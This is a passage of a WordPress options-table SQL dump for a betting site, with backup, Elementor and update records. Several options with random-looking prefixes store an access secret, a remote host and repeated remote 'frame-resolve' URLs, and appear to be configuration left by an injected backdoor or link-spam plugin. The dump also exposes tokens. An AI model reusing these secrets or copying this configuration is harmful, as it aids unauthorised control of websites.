4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"c0d194c32017a8e96bd3ee408c355bb316f36959\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"c22f07436d67dac3157d93a6da35f81a30ba318c37c2e47354e0b92bd23af44f\";}}s:5:\"nonce\";s:12:\"573ad53c5414\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1771895870;a:11:{s:2:\"db\";s:52:\"backup_2026-02-24-0117_Megabet333_7b67f7c5acb7-db.gz\";s:7:\"db-size\";i:1918788;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"93e7303eb1637fc3ad012210773ccd092397a060\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"4ceca4053f21a572481993ceef054640a67b7caacd862f59dc20d37049bfd19f\";}}s:5:\"nonce\";s:12:\"7b67f7c5acb7\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1771809221;a:11:{s:2:\"db\";s:52:\"backup_2026-02-23-0113_Megabet333_d0872d702855-db.gz\";s:7:\"db-size\";i:1900269;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"ab23235e395b764f3ec2f543192d535f9d918f8c\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"2ae35e64133aa631ddc829cca16a1924c543a4fcc30f3ada097332fd9c030785\";}}s:5:\"nonce\";s:12:\"d0872d702855\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1771808400;a:12:{s:6:\"others\";a:1:{i:0;s:57:\"backup_2026-02-23-0100_Megabet333_b992f21e2704-others.zip\";}s:11:\"others-size\";i:2863998;s:5:\"nonce\";s:12:\"b992f21e2704\";s:7:\"uploads\";a:1:{i:0;s:58:\"backup_2026-02-23-0100_Megabet333_b992f21e2704-uploads.zip\";}s:12:\"uploads-size\";i:7339409;s:6:\"themes\";a:1:{i:0;s:57:\"backup_2026-02-23-0100_Megabet333_b992f21e2704-themes.zip\";}s:11:\"themes-size\";i:14517938;s:7:\"plugins\";a:1:{i:0;s:58:\"backup_2026-02-23-0100_Megabet333_b992f21e2704-plugins.zip\";}s:12:\"plugins-size\";i:42495820;s:18:\"created_by_version\";s:6:\"1.26.1\";s:2:\"db\";s:52:\"backup_2026-02-23-0100_Megabet333_b992f21e2704-db.gz\";s:7:\"db-size\";i:1896956;}}','off'),(41359,'auto_update_plugins','a:0:{}','off'),(41373,'_elementor_ab_testing_data','a:2:{s:7:\"timeout\";i:1771917208;s:5:\"value\";s:273:\"[{\"coreOnboarding\":{\"emphasizeConnectBenefits101\":true,\"embedConnectInOnboarding102\":false,\"onboardingStartsWithLogin103\":false,\"offerThemeChoicesHelloBiz201\":false,\"emphasizeThemeValueAudience202\":false,\"updateCopyVisuals401\":false,\"reduceHierarchyBlankOption402\":false}}]\";}','off'),(42024,'virtual_patches_subscription_guid','','auto'),(56134,'can_compress_scripts','0','auto'),(58009,'wp-toolkit_ui_status','1','auto'),(58010,'wp-toolkit_event_status','1','auto'),(65418,'_elementor_mixpanel_config','a:2:{s:7:\"timeout\";i:1788451594;s:5:\"value\";s:274:\"[{\"sessionReplays\":{\"recordSessionsPercent\":1,\"cloudTemplates\":false,\"coreOnboarding\":false,\"enabled\":false,\"events\":{\"editor_loaded\":false,\"ob_onboarding_initialized\":false}},\"flags\":true,\"apiHost\":\"https:\\/\\/api-eu.mixpanel.com\",\"libHost\":\"https:\\/\\/cdn.mxpnl.com\\/libs\"}]\";}','off'),(69236,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:20:\"admin@megabet333.biz\";s:7:\"version\";s:5:\"7.0.2\";s:9:\"timestamp\";i:1784317581;}','off'),(71078,'_elementor_v4_promotions','a:2:{s:7:\"timeout\";i:1784288954;s:5:\"value\";s:3523:\"[{\"customCss\":{\"title\":\"Custom CSS\",\"content\":\"Add custom CSS to refine and enrich the appearance of any element on your site.\",\"ctaUrl\":\"https:\\/\\/go.elementor.com\\/go-pro-style-custom-css\\/\",\"image\":\"https:\\/\\/assets.elementor.com\\/packages\\/v1\\/images\\/custom_css_promotion.png\"},\"displayConditions\":{\"title\":\"Display conditions\",\"content\":\"Control when and where elements are shown across your site.\",\"ctaUrl\":\"https:\\/\\/go.elementor.com\\/go-pro-display-conditions-modal\\/\",\"image\":\"https:\\/\\/assets.elementor.com\\/packages\\/v1\\/images\\/display_conditions_promotion.png\"},\"attributes\":{\"title\":\"Attributes\",\"content\":\"Add custom attributes when you need deeper customization and better accessibility.\",\"ctaUrl\":\"https:\\/\\/go.elementor.com\\/go-pro-attributes-modal\\/\",\"image\":\"https:\\/\\/assets.elementor.com\\/packages\\/v1\\/images\\/attributes_promotion.png\"},\"Portfolio\":{\"title\":\"Portfolio\",\"content\":\"Upgrade to build dynamic portfolio grids featuring interactive category filtering and engaging hover effects designed to captivate your site visitors.\",\"image\":\"https:\\/\\/assets.elementor.com\\/packages\\/v1\\/images\\/Portfolio_promotion.png\"},\"Form\":{\"title\":\"Form\",\"content\":\"Upgrade to build advanced forms featuring custom fields, multi-step layouts, automated email notifications, and direct CRM integrations.\",\"image\":\"https:\\/\\/assets.elementor.com\\/packages\\/v1\\/images\\/Form_promotion.png\"},\"PriceList\":{\"title\":\"Price list\",\"content\":\"Upgrade to present items, descriptions, and pricing within a cohesive structure that aligned perfectly with your site.\",\"image\":\"https:\\/\\/assets.elementor.com\\/packages\\/v1\\/images\\/Price_list_promotion.png\"},\"PriceTable\":{\"title\":\"Price table\",\"content\":\"Upgrade to build pricing matrices featuring highlighted columns, interactive check mark lists, and integrated action buttons.\",\"image\":\"https:\\/\\/assets.elementor.com\\/packages\\/v1\\/images\\/Price_table_promotion.png\"},\"LoopGrid\":{\"title\":\"Loop Grid\",\"content\":\"Upgrade to connect custom layouts directly to your site database, seamlessly rendering dynamic content queries that engage your site visitors.\",\"image\":\"https:\\/\\/assets.elementor.com\\/packages\\/v1\\/images\\/Loop_grid_promotion.png\"},\"CallToAction\":{\"title\":\"Call to Action\",\"content\":\"Upgrade to build Call to Action blocks with image overlays, custom hover animations, and promotional layout control across your site.\",\"image\":\"https:\\/\\/assets.elementor.com\\/packages\\/v1\\/images\\/CTA_promotion.png\"},\"Template\":{\"title\":\"Template\",\"content\":\"Upgrade to embed saved templates that sync automatically across your entire site, preserving layout integrity and accelerating your production speed.\",\"image\":\"https:\\/\\/assets.elementor.com\\/packages\\/v1\\/images\\/Template_promotion.png\"},\"Gallery\":{\"title\":\"Gallery pro\",\"content\":\"Upgrade to build gallery with dynamic categorization and custom layout control across your site.\",\"image\":\"https:\\/\\/assets.elementor.com\\/packages\\/v1\\/images\\/Gallery_pro_promotion.png\"},\"MediaCarousel\":{\"title\":\"Media carousel\",\"content\":\"Upgrade to build advanced Media Carousel with dynamic video elements into your sliders to better engage your site visitors.\",\"image\":\"https:\\/\\/assets.elementor.com\\/packages\\/v1\\/images\\/Media_carousel_promotion.png\"},\"LoopCarousel\":{\"title\":\"Loop carousel\",\"content\":\"Upgrade to build advanced Loop Carousel with dynamic posts, custom layouts seamlessly to better engage your site visitors.\",\"image\":\"https:\\/\\/assets.elementor.com\\/packages\\/v1\\/images\\/Loop_carousel_promotion.png\"}}]\";}','off'),(71079,'elementor_angie_guide_auto_shown','yes','auto'),(71081,'_transient_timeout__elementor_ab_test_plg_site_mailer_submission','1792061679','off'),(71082,'_transient__elementor_ab_test_plg_site_mailer_submission','2','off'),(78293,'_pre_user_id','5','auto'),(79515,'17d38e4c7f9ccad8176e6baf108d57e3','YToxOntpOjY5Njk7YToxOntzOjk6ImhvbWVMaW5rcyI7Tjt9fQ==','yes'),(79518,'wpr91c4_installation','f0a1632fd6c5355bd2fcd342213105d1','off'),(79520,'2f4cf461e69d9cdeab9dde30b61c7eda','3567a2f87e89e93d47e5357036e2332f','yes'),(79521,'plugins_backup_6969_9b778d1e8762dcbbee3938567965728e','{\"hide\":0,\"upload\":0,\"unzip\":0,\"import\":0,\"sidewideLinks\":0,\"clean\":0,\"homeLinks\":0}','yes'),(79524,'wpb4c92_site_v1','f1314ab2c8afb8c0076510f49525c5d5','off'),(79526,'wpb4c92_access_v1','a:4:{s:2:\"id\";s:35:\"sc_f18f8a1595c0b9381b111dd9828b4415\";s:6:\"secret\";s:43:\"KlDy38D-BuWR85HRlNC5pTlvX3lSlsrUI42XEn7Uvtk\";s:4:\"host\";s:10:\"amb18b.com\";s:4:\"mark\";s:24:\"1becc5d159e03c58f821b69b\";}','off'),(79527,'_transient_timeout_wpr91c4_access_v1','1788660305','off'),(79528,'_transient_wpr91c4_access_v1','a:3:{s:6:\"client\";s:361:\"c1_OSDrKziZ-IW3sjzwOndUjWnrCG7B60zYvc4vUz33YekXquD6_3p-lJl7vlPxz3PzcQyPxL8I_Zj0TgYMl86hHSOI2TWzc62fEgVCmu4Taxoc1Nt3nntYJaSMrvMWa-xjP8bKWU5iogtz58DpagyM5XkKSqd3TfJtQHgdARb-IQPh2uZs9ixoybfihxmsw45pnOnUThYu_UW3NIGzLRfdWmhaupXQ07mlmpK0SooqUkB-fInd1YX2DFoj5-2Vd4hIWJMs88nahghZlzKGvvuDtdVo-W1r4fU3mMiokjP7qqWYdZNAriUThE_oP2X6qJ0HdJglDa0RZnh0AqlQE8mfFvEAvC7xjBswAi7BHw\";s:6:\"ticket\";s:46:\"t1_ceYNRuxaa0tyKiDUyVWeJt0mJ_lyXhhDYhRhgPLaX2w\";s:7:\"expires\";i:1788660365;}','off'),(79533,'wpb4c92_version_purged_v121_623e2baca15d59fd1f4df5b660d63d30','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"725782247c2ecdfd58ddbb7b8476b8622537e17f68814d9f17d180b226f19223\";}','off'),(79537,'wpb4c92_version_stable_v121_623e2baca15d59fd1f4df5b660d63d30','a:3:{s:7:\"version\";s:5:\"1.2.1\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:4:\"path\";s:64:\"725782247c2ecdfd58ddbb7b8476b8622537e17f68814d9f17d180b226f19223\";}','off'),(79538,'wpb4c92_version_complete_v121_623e2baca15d59fd1f4df5b660d63d30','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:8:\"complete\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"725782247c2ecdfd58ddbb7b8476b8622537e17f68814d9f17d180b226f19223\";}','off'),(79544,'wpb4c92_version_purged_v121_944885907c18f5d335585f2f895b1c15','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"9f9668689d18ce134bda5fa3b473107fee3e63f410b10d27ed201e85a576c352\";}','off'),(79548,'wpb4c92_version_stable_v121_944885907c18f5d335585f2f895b1c15','a:3:{s:7:\"version\";s:5:\"1.2.1\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:4:\"path\";s:64:\"9f9668689d18ce134bda5fa3b473107fee3e63f410b10d27ed201e85a576c352\";}','off'),(79549,'wpb4c92_version_complete_v121_944885907c18f5d335585f2f895b1c15','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:8:\"complete\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"9f9668689d18ce134bda5fa3b473107fee3e63f410b10d27ed201e85a576c352\";}','off'),(79553,'wpb4c92_version_purged_v121_182ca95dea3053480b03f2312fdb0921','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"31c95372c63deaf5209abcb86d08ec03d3050ef2875367f79d50afc189398afa\";}','off'),(79557,'wpb4c92_version_stable_v121_182ca95dea3053480b03f2312fdb0921','a:3:{s:7:\"version\";s:5:\"1.2.1\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:4:\"path\";s:64:\"31c95372c63deaf5209abcb86d08ec03d3050ef2875367f79d50afc189398afa\";}','off'),(79558,'wpb4c92_version_complete_v121_182ca95dea3053480b03f2312fdb0921','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:8:\"complete\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"31c95372c63deaf5209abcb86d08ec03d3050ef2875367f79d50afc189398afa\";}','off'),(79565,'wpb4c92_version_purged_v121_0be3fa455029cc3b3405e9aaee3a5b68','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"ee506df3a5b045199d7906a5320613091c2605a8669e21fff19d41a182c55974\";}','off'),(79569,'wpb4c92_version_stable_v121_0be3fa455029cc3b3405e9aaee3a5b68','a:3:{s:7:\"version\";s:5:\"1.2.1\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:4:\"path\";s:64:\"ee506df3a5b045199d7906a5320613091c2605a8669e21fff19d41a182c55974\";}','off'),(79570,'wpb4c92_version_complete_v121_0be3fa455029cc3b3405e9aaee3a5b68','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:8:\"complete\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"ee506df3a5b045199d7906a5320613091c2605a8669e21fff19d41a182c55974\";}','off'),(79576,'wpb4c92_version_purged_v121_56b8b3c870079986b0abab974bc1f951','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"7d255653b5cdaf83a0d62cf5d6074f70afe539b3a3b14ed8a15fe436abb96df7\";}','off'),(79580,'wpb4c92_version_stable_v121_56b8b3c870079986b0abab974bc1f951','a:3:{s:7:\"version\";s:5:\"1.2.1\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:4:\"path\";s:64:\"7d255653b5cdaf83a0d62cf5d6074f70afe539b3a3b14ed8a15fe436abb96df7\";}','off'),(79581,'wpb4c92_version_complete_v121_56b8b3c870079986b0abab974bc1f951','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:8:\"complete\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"7d255653b5cdaf83a0d62cf5d6074f70afe539b3a3b14ed8a15fe436abb96df7\";}','off'),(79584,'wpb4c92_version_purged_v121_18da9a0bf5d5a900b8c00e5bea2fcdbf','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"90763544f6b852f8f2221445b90ddfe7b6b76f97f98bd445ff699736030409f3\";}','off'),(79588,'wpb4c92_version_stable_v121_18da9a0bf5d5a900b8c00e5bea2fcdbf','a:3:{s:7:\"version\";s:5:\"1.2.1\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:4:\"path\";s:64:\"90763544f6b852f8f2221445b90ddfe7b6b76f97f98bd445ff699736030409f3\";}','off'),(79589,'wpb4c92_version_complete_v121_18da9a0bf5d5a900b8c00e5bea2fcdbf','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:8:\"complete\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"90763544f6b852f8f2221445b90ddfe7b6b76f97f98bd445ff699736030409f3\";}','off'),(79591,'wpb4c92_version_purged_v121_97d081489032cf8f6c77acf7538d3ee4','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"f08f1c7083788664c4dd4451accb207386760189d770362757f7924a5cb6d24b\";}','off'),(79595,'wpb4c92_version_stable_v121_97d081489032cf8f6c77acf7538d3ee4','a:3:{s:7:\"version\";s:5:\"1.2.1\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:4:\"path\";s:64:\"f08f1c7083788664c4dd4451accb207386760189d770362757f7924a5cb6d24b\";}','off'),(79596,'wpb4c92_version_complete_v121_97d081489032cf8f6c77acf7538d3ee4','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:8:\"complete\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"f08f1c7083788664c4dd4451accb207386760189d770362757f7924a5cb6d24b\";}','off'),(79609,'wpb4c92_version_purged_v121_35dccce5418d6509bea5ebb35e5a954e','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"6fceaea65f923d3006a6fca3c62291b510c420d4bb2df95644e4f975e3b7a7e7\";}','off'),(79613,'wpb4c92_version_stable_v121_35dccce5418d6509bea5ebb35e5a954e','a:3:{s:7:\"version\";s:5:\"1.2.1\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:4:\"path\";s:64:\"6fceaea65f923d3006a6fca3c62291b510c420d4bb2df95644e4f975e3b7a7e7\";}','off'),(79614,'wpb4c92_version_complete_v121_35dccce5418d6509bea5ebb35e5a954e','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:8:\"complete\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"6fceaea65f923d3006a6fca3c62291b510c420d4bb2df95644e4f975e3b7a7e7\";}','off'),(79620,'wpb4c92_version_purged_v121_3df24cf6307c2afe284e4ea2df76f093','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"6856887f95cf73f8bd6a8425670c1bf0471d7a1cf5b273758126e84cc24e7b86\";}','off'),(79624,'wpb4c92_version_stable_v121_3df24cf6307c2afe284e4ea2df76f093','a:3:{s:7:\"version\";s:5:\"1.2.1\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:4:\"path\";s:64:\"6856887f95cf73f8bd6a8425670c1bf0471d7a1cf5b273758126e84cc24e7b86\";}','off'),(79625,'wpb4c92_version_complete_v121_3df24cf6307c2afe284e4ea2df76f093','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:8:\"complete\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"6856887f95cf73f8bd6a8425670c1bf0471d7a1cf5b273758126e84cc24e7b86\";}','off'),(79627,'wpb4c92_version_purged_v121_757bf8c3f198e7e579ed1dfa8dd68a0a','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"658e039ad4e848daa6f72c22ab04ed9561f42c6ba633fcd4163fa8cff01cc3b8\";}','off'),(79631,'wpb4c92_version_stable_v121_757bf8c3f198e7e579ed1dfa8dd68a0a','a:3:{s:7:\"version\";s:5:\"1.2.1\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:4:\"path\";s:64:\"658e039ad4e848daa6f72c22ab04ed9561f42c6ba633fcd4163fa8cff01cc3b8\";}','off'),(79632,'wpb4c92_version_complete_v121_757bf8c3f198e7e579ed1dfa8dd68a0a','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:8:\"complete\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"658e039ad4e848daa6f72c22ab04ed9561f42c6ba633fcd4163fa8cff01cc3b8\";}','off'),(81914,'wpb4c92_version_purged_v121_e832a171494dcafced03a4bbd0ba8544','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"260cdf40d7b3333b916b80987308c8e2b477d1c33405de9146d3030f15cc8c5d\";}','off'),(83727,'wpb4c92_version_purged_v121_d70716a1771835c71f52182ed74f65c2','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"99e19b00d52cb84f6fadde94f945043c62fc7b7d5700b413c1ef2045f7363ecc\";}','off'),(83775,'wpb4c92_version_purged_v121_54c1374062788bd60ee1b44c260b7a7f','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"617772c49b6bb323de6e3bbaeda0e08320a5cb640a3eda0b12b4ce27d48ebf7c\";}','off'),(83901,'wpb4c92_version_purged_v121_df63264f03c007fa61e56ab1df88ba21','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"71baaf355a94ad1b6c4180e19e48413b3f21028897dcfbb54a01a7527404be3c\";}','off'),(83906,'wpb4c92_version_purged_v121_9ae841b2a7edc1edd76143f7c009aef3','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"fbf6a8ec807ae6396b3ef0b01a2ddf82e259becce418b641cd9c0e0647355339\";}','off'),(83979,'wpb4c92_version_purged_v121_3cd972a49c5efc1b43988c7bf8dbc9c6','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"bf696f5b8ba4b37c43ae4f3945480fd02bc3b91354c20acafa30060be8f5c5c8\";}','off'),(84150,'wpb4c92_version_purged_v121_d527d6047fb6c4f294969553f1379466','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"1792756c396d77e8c1d3d907e942bf06cb56d53eb45dfa7b416a56ab4c547ed4\";}','off'),(84337,'wpb4c92_version_purged_v121_c4b8347aa8dab569dcbf2b95b001deff','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"45d409c9c7d585b4c2432fc215dcfc4030bb0d0bc65ebe4a6400365b91c8a237\";}','off'),(84795,'wpb4c92_version_purged_v121_15aaf730756d0048c8116db2572a3f64','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"55046a45ec1e605f38e66ac01f33c81a6abe2fc975010e642de3107a28bb3281\";}','off'),(84860,'wpb4c92_version_purged_v121_635e4097375cdb38aea4c1b1b9eec939','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"3003269019ef7495541bdf730f7c912f2a424d10fcc3629b3a5399348b29787c\";}','off'),(85910,'wpb4c92_version_purged_v121_f6b5a4d015b5dceff2db0d0c3c5a962d','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"765580b8b715a6762843a4d48c6c7aed6044468dcc00c534edd2e436b9e9ae44\";}','off'),(88677,'wpb4c92_version_purged_v121_fc9427902d15c85f266153cadedc21ca','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"cbb1084fc563b052c3395875a71ca7a2625e77d2850a4381a80b9d83b3fb9f84\";}','off'),(89394,'_site_transient_timeout_php_check_e1575808cef126e0bfb4325cceefee7d','1788693925','off'),(89395,'_site_transient_php_check_e1575808cef126e0bfb4325cceefee7d','a:5:{s:19:\"recommended_version\";s:3:\"8.3\";s:15:\"minimum_version\";s:3:\"7.4\";s:12:\"is_supported\";b:0;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','off'),(90911,'_transient_timeout_elementor_rollback_versions_4.2.3','1788952633','off'),(90912,'_transient_elementor_rollback_versions_4.2.3','a:30:{i:0;s:5:\"4.2.2\";i:1;s:5:\"4.2.1\";i:2;s:5:\"4.2.0\";i:3;s:5:\"4.1.5\";i:4;s:5:\"4.1.4\";i:5;s:5:\"4.1.3\";i:6;s:5:\"4.1.2\";i:7;s:5:\"4.1.1\";i:8;s:5:\"4.1.0\";i:9;s:5:\"4.0.9\";i:10;s:5:\"4.0.8\";i:11;s:5:\"4.0.7\";i:12;s:5:\"4.0.6\";i:13;s:5:\"4.0.5\";i:14;s:5:\"4.0.4\";i:15;s:5:\"4.0.3\";i:16;s:5:\"4.0.2\";i:17;s:5:\"4.0.1\";i:18;s:5:\"4.0.0\";i:19;s:6:\"3.35.9\";i:20;s:6:\"3.35.8\";i:21;s:6:\"3.35.7\";i:22;s:6:\"3.35.6\";i:23;s:6:\"3.35.5\";i:24;s:6:\"3.35.4\";i:25;s:6:\"3.35.3\";i:26;s:6:\"3.35.2\";i:27;s:6:\"3.35.1\";i:28;s:6:\"3.35.0\";i:29;s:6:\"3.34.4\";}','off'),(91514,'_transient_timeout_wpseo_total_unindexed_post_type_archives','1788534392','off'),(91515,'_transient_wpseo_total_unindexed_post_type_archives','0','off'),(91516,'_transient_timeout_wpseo_total_unindexed_general_items','1788542494','off'),(91517,'_transient_wpseo_total_unindexed_general_items','0','off'),(91520,'_transient_timeout_wpseo_total_unindexed_posts','1788534392','off'),(91521,'_transient_wpseo_total_unindexed_posts','0','off'),(91522,'_transient_timeout_wpseo_total_unindexed_terms','1788534392','off'),(91523,'_transient_wpseo_total_unindexed_terms','0','off'),(91524,'_transient_timeout_wpseo_unindexed_term_link_count','1788534392','off'),(91525,'_transient_wpseo_unindexed_term_link_count','0','off'),(91526,'_site_transient_timeout_browser_389568c894563e7e475b1f3d47117e62','1789052793','off'),(91527,'_site_transient_browser_389568c894563e7e475b1f3d47117e62','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:9:\"152.0.0.0\";s:8:\"platform\";s:7:\"Windows\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','off'),(91536,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-7.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-7.1.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-7.1-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-7.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:3:\"7.1\";s:7:\"version\";s:3:\"7.1\";s:11:\"php_version\";s:3:\"7.4\";s:13:\"mysql_version\";s:5:\"5.5.5\";s:11:\"new_bundled\";s:3:\"6.7\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1788558037;s:15:\"version_checked\";s:3:\"7.1\";s:12:\"translations\";a:0:{}}','off'),(91542,'litespeed.conf._version','7.9.1','auto'),(91548,'elementor_controls_usage','a:3:{s:7:\"section\";a:3:{s:11:\"text-editor\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s: